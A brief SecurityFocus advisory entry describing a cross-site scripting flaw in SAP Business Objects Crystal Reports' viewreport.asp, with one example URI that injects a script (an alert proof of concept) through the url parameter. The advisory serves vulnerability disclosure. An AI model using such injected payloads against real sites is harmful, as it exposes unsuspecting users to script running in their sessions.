SAP Business Objects Crystal Reports 'viewreport.asp' Cross Site Scripting Vulnerability

An attacker can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.

The following example URI is available:

https://www.example.com/some/path/viewreport.asp?url=viewrpt.cwr?ID=7777"%0d%0awindow.alert%20"fsck_cissp^^INIT=actx:connect


 

Privacy Statement
Copyright 2010, SecurityFocus